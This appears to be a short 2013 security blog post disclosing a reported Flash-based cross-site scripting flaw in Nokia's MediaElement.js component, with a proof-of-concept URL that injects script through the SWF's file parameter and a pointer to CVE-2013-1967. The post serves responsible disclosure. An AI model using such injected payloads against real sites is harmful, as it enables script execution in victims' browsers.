Flash-based XSS in Nokia's MediaElements component

June 29, 2013

Here I present a (reported) Flash-based XSS vulnerability I discovered in r.nokia.com, requiring no user interaction.

PoC URL:

http://r.nokia.com/s/6.0/assets/js/flashmediaelement.swf?debug=true&file=x%22});alert(1);//&autoplay=true

This is a well known vulnerability with MediaElement.js, that has been patched last year from version 2.11.2 (see CVE-2013-1967, GitHub patch commit).

The version running on r.nokia.com used to be 2.9.1, as could be seen in:

http://r.nokia.com/s/6.0/assets/js/mediaelement-and-player.js

( mejs.version="2.9.1"; )

Screenshot using the Chrome debugger:

Screenshot of the XSS vulnerability triggered
xssflash
Creative Commons Attribution-ShareAlike 4.0 International License

Stored XSS in GMail

Flash-based XSS in Yandex's AmCharts component